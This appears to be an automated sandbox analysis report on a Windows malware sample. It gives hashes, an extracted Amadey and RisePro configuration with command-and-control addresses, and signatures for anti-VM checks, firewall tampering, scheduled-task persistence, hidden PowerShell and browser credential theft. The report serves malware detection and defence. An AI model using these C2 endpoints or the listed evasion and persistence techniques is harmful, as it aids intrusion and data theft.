Analysis
-
max time kernel
91s -
max time network
152s -
platform
windows11-21h2_x64 -
resource
win11-20240426-en -
resource tags
arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system -
submitted
12-05-2024 04:40
Static task
static1
Behavioral task
behavioral1
Sample
2fbb454dfee76dd9c72e45e134acff79da30a6b007305c852b3d293c69af30d5.exe
Resource
win10v2004-20240508-en
General
-
Target
2fbb454dfee76dd9c72e45e134acff79da30a6b007305c852b3d293c69af30d5.exe
-
Size
1.8MB
-
MD5
44f6004630007026ed35d9037f3d447d
-
SHA1
79922204b4741197dfb045f6243f8d4abf7b655d
-
SHA256
2fbb454dfee76dd9c72e45e134acff79da30a6b007305c852b3d293c69af30d5
-
SHA512
6aaaa94f531c410a506b30a93b338ff97f5e066618898a5225ab1825f6da030a6ba41838501f0e94269daa13bcf7789f21b8699d01b3fdad4688f0d07544a641
-
SSDEEP
24576:u5qhtFifs6C2D/ZbEPwCjSxvDP8QllwwRJ3olYbQYDWQifu04QCoh2dOw6efpiu9:Z2jZ4PwWCP8QswR30d204bohPw7fUx
Malware Config
Extracted
amadey
4.20
http://5.42.96.141
http://5.42.96.7
-
install_dir
908f070dff
-
install_file
explorku.exe
-
strings_key
b25a9385246248a95c600f9a061438e1
-
url_paths
/go34ko8/index.php
Extracted
risepro
147.45.47.126:58709
Signatures
-
Detect ZGRat V1 3 IoCs
resource yara_rule behavioral2/memory/5416-463-0x000001DBF7C70000-0x000001DBFB4A4000-memory.dmp family_zgrat_v1 behavioral2/memory/5416-469-0x000001DBFDE00000-0x000001DBFDF0A000-memory.dmp family_zgrat_v1 behavioral2/memory/5416-475-0x000001DBFDD20000-0x000001DBFDD44000-memory.dmp family_zgrat_v1 -
Modifies firewall policy service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" sxH8wPyOdz7RaPkmDFy3Ezsl.exe -
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplons.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ab3480ef7f.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplons.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorku.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2fbb454dfee76dd9c72e45e134acff79da30a6b007305c852b3d293c69af30d5.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorku.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorku.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ amers.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 53 3628 u1wo.0.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 31 IoCs
Run Powershell and hide display window.
pid Process 3696 powershell.EXE 1008 powershell.exe 4536 powershell.exe 6120 powershell.exe 1480 powershell.exe 3628 powershell.exe 5168 powershell.exe 6024 powershell.exe 1088 powershell.exe 4632 powershell.exe 5088 powershell.exe 3912 powershell.exe 5196 powershell.exe 3404 powershell.exe 3184 powershell.exe 2192 powershell.exe 1972 powershell.exe 956 powershell.exe 3800 powershell.exe 1768 powershell.exe 5536 powershell.exe 1248 powershell.exe 3184 powershell.exe 5828 powershell.exe 6120 powershell.exe 5812 powershell.exe 6128 powershell.exe 1248 powershell.exe 2436 powershell.exe 4648 powershell.exe 5088 powershell.exe -
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 4 IoCs
pid Process 5740 netsh.exe 5712 netsh.exe 6072 netsh.exe 4648 netsh.exe -
Checks BIOS information in registry 2 TTPs 18 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2fbb454dfee76dd9c72e45e134acff79da30a6b007305c852b3d293c69af30d5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorku.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion amers.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion amers.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorku.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ab3480ef7f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorku.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorku.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2fbb454dfee76dd9c72e45e134acff79da30a6b007305c852b3d293c69af30d5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorku.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorku.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ab3480ef7f.exe -
Executes dropped EXE 29 IoCs
pid Process 428 explorku.exe 4888 explorku.exe 696 amers.exe 3856 axplons.exe 3668 ab3480ef7f.exe 4644 file300un.exe 1336 NewB.exe 3180 ISetup8.exe 4692 axplons.exe 1028 explorku.exe 3864 NewB.exe 2808 u2gc.0.exe 4600 u2gc.1.exe 2472 Hvoiy4AeWVSFQ1Iu3PervIKv.exe 916 KJrrevHavC5XbNvd93Zt87NV.exe 3004 Zl7alJlvns99KqkrvTPtua9F.exe 4700 sd9DA3ZWGLEoKHgSiqfkjIaO.exe 5060 sxH8wPyOdz7RaPkmDFy3Ezsl.exe 940 QB6YJisOeMAwgSEX9tGB7uFD.exe 3628 u1wo.0.exe 5668 u1wo.1.exe 2268 Zl7alJlvns99KqkrvTPtua9F.exe 2392 sd9DA3ZWGLEoKHgSiqfkjIaO.exe 5516 QB6YJisOeMAwgSEX9tGB7uFD.exe 5480 KJrrevHavC5XbNvd93Zt87NV.exe 5948 9jNfLlKCEF3ERyMnjj34oq77.exe 812 Install.exe 1532 OiMQrdAwVVHWkDVgxlIifdu6.exe 2884 Install.exe -
Identifies Wine through registry keys 2 TTPs 7 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Wine explorku.exe Key opened \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Wine amers.exe Key opened \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Wine axplons.exe Key opened \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Wine axplons.exe Key opened \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Wine explorku.exe Key opened \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Wine 2fbb454dfee76dd9c72e45e134acff79da30a6b007305c852b3d293c69af30d5.exe Key opened \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Wine explorku.exe -
Loads dropped DLL 2 IoCs
pid Process 2808 u2gc.0.exe 2808 u2gc.0.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/files/0x000100000002aa1c-91.dat themida behavioral2/memory/3668-105-0x0000000000180000-0x0000000000811000-memory.dmp themida behavioral2/memory/3668-107-0x0000000000180000-0x0000000000811000-memory.dmp themida behavioral2/memory/3668-109-0x0000000000180000-0x0000000000811000-memory.dmp themida behavioral2/memory/3668-108-0x0000000000180000-0x0000000000811000-memory.dmp themida behavioral2/memory/3668-112-0x0000000000180000-0x0000000000811000-memory.dmp themida behavioral2/memory/3668-106-0x0000000000180000-0x0000000000811000-memory.dmp themida behavioral2/memory/3668-113-0x0000000000180000-0x0000000000811000-memory.dmp themida behavioral2/memory/3668-111-0x0000000000180000-0x0000000000811000-memory.dmp themida behavioral2/memory/3668-110-0x0000000000180000-0x0000000000811000-memory.dmp themida behavioral2/memory/3668-119-0x0000000000180000-0x0000000000811000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Microsoft\Windows\CurrentVersion\Run\ab3480ef7f.exe = "C:\\Users\\Admin\\1000006002\\ab3480ef7f.exe" explorku.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA ab3480ef7f.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 13 pastebin.com 19 pastebin.com -
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 13 ipinfo.io 18 api.myip.com 39 api.myip.com 40 ipinfo.io -
Drops file in System32 directory 13 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\System32\GroupPolicy sxH8wPyOdz7RaPkmDFy3Ezsl.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini sxH8wPyOdz7RaPkmDFy3Ezsl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI sxH8wPyOdz7RaPkmDFy3Ezsl.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol sxH8wPyOdz7RaPkmDFy3Ezsl.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
pid Process 3772 2fbb454dfee76dd9c72e45e134acff79da30a6b007305c852b3d293c69af30d5.exe 428 explorku.exe 4888 explorku.exe 696 amers.exe 3856 axplons.exe 4692 axplons.exe 1028 explorku.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 428 set thread context of 4888 428 explorku.exe 84 PID 956 set thread context of 2096 956 powershell.exe 109 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 4 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN sd9DA3ZWGLEoKHgSiqfkjIaO.exe File opened (read-only) \??\VBoxMiniRdrDN KJrrevHavC5XbNvd93Zt87NV.exe File opened (read-only) \??\VBoxMiniRdrDN QB6YJisOeMAwgSEX9tGB7uFD.exe File opened (read-only) \??\VBoxMiniRdrDN Zl7alJlvns99KqkrvTPtua9F.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\Tasks\explorku.job 2fbb454dfee76dd9c72e45e134acff79da30a6b007305c852b3d293c69af30d5.exe File created C:\Windows\Tasks\axplons.job amers.exe File created C:\Windows\Tasks\bbmnnUCIPYyTQrzMQJ.job schtasks.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 5504 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
pid pid_target Process procid_target 5060 3180 WerFault.exe 96 5744 2472 WerFault.exe 113 -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u2gc.1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u2gc.1.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u2gc.1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u1wo.1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u1wo.1.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u1wo.1.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 u2gc.0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString u2gc.0.exe -
Creates scheduled task(s) 1 TTPs 16 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1792 schtasks.exe 4744 schtasks.exe 2624 schtasks.exe 2444 schtasks.exe 5496 schtasks.exe 5800 schtasks.exe 5876 schtasks.exe 2528 schtasks.exe 2548 schtasks.exe 5476 schtasks.exe 5712 schtasks.exe 4968 schtasks.exe 3728 schtasks.exe 5672 schtasks.exe 5932 schtasks.exe 1432 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2772 = "Omsk Standard Time" sd9DA3ZWGLEoKHgSiqfkjIaO.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1831 = "Russia TZ 2 Daylight Time" sd9DA3ZWGLEoKHgSiqfkjIaO.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" sd9DA3ZWGLEoKHgSiqfkjIaO.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time" sd9DA3ZWGLEoKHgSiqfkjIaO.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" sd9DA3ZWGLEoKHgSiqfkjIaO.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time" sd9DA3ZWGLEoKHgSiqfkjIaO.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time" sd9DA3ZWGLEoKHgSiqfkjIaO.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time" sd9DA3ZWGLEoKHgSiqfkjIaO.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1932 = "Russia TZ 11 Standard Time" sd9DA3ZWGLEoKHgSiqfkjIaO.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2181 = "Astrakhan Daylight Time" sd9DA3ZWGLEoKHgSiqfkjIaO.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2412 = "Marquesas Standard Time" sd9DA3ZWGLEoKHgSiqfkjIaO.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time" sd9DA3ZWGLEoKHgSiqfkjIaO.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" sd9DA3ZWGLEoKHgSiqfkjIaO.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time" sd9DA3ZWGLEoKHgSiqfkjIaO.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2871 = "Magallanes Daylight Time" sd9DA3ZWGLEoKHgSiqfkjIaO.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time" sd9DA3ZWGLEoKHgSiqfkjIaO.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1971 = "Belarus Daylight Time" sd9DA3ZWGLEoKHgSiqfkjIaO.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" sd9DA3ZWGLEoKHgSiqfkjIaO.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time" sd9DA3ZWGLEoKHgSiqfkjIaO.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" sd9DA3ZWGLEoKHgSiqfkjIaO.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time" sd9DA3ZWGLEoKHgSiqfkjIaO.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1501 = "Turkey Daylight Time" sd9DA3ZWGLEoKHgSiqfkjIaO.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time" sd9DA3ZWGLEoKHgSiqfkjIaO.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1871 = "Russia TZ 7 Daylight Time" sd9DA3ZWGLEoKHgSiqfkjIaO.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2631 = "Norfolk Daylight Time" sd9DA3ZWGLEoKHgSiqfkjIaO.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1912 = "Russia TZ 10 Standard Time" sd9DA3ZWGLEoKHgSiqfkjIaO.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3772 2fbb454dfee76dd9c72e45e134acff79da30a6b007305c852b3d293c69af30d5.exe 3772 2fbb454dfee76dd9c72e45e134acff79da30a6b007305c852b3d293c69af30d5.exe 428 explorku.exe 428 explorku.exe 4888 explorku.exe 4888 explorku.exe 696 amers.exe 696 amers.exe 3856 axplons.exe 3856 axplons.exe 956 powershell.exe 956 powershell.exe 956 powershell.exe 956 powershell.exe 956 powershell.exe 956 powershell.exe 956 powershell.exe 956 powershell.exe 4692 axplons.exe 4692 axplons.exe 1028 explorku.exe 1028 explorku.exe 2808 u2gc.0.exe 2808 u2gc.0.exe 5088 powershell.exe 5088 powershell.exe 4648 powershell.exe 4648 powershell.exe 3184 powershell.exe 3184 powershell.exe 3800 powershell.exe 3800 powershell.exe 4648 powershell.exe 5088 powershell.exe 3800 powershell.exe 3184 powershell.exe 5416 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 5416 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 5416 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 5416 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 5416 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 5416 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 5416 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 5416 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 5416 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 5416 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 5416 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 5416 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 5416 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 5416 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 5416 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 5416 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 5416 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 5416 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 5416 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 5416 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 5416 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 5416 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 5416 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 5416 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 916 KJrrevHavC5XbNvd93Zt87NV.exe 916 KJrrevHavC5XbNvd93Zt87NV.exe 940 QB6YJisOeMAwgSEX9tGB7uFD.exe 3004 Zl7alJlvns99KqkrvTPtua9F.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
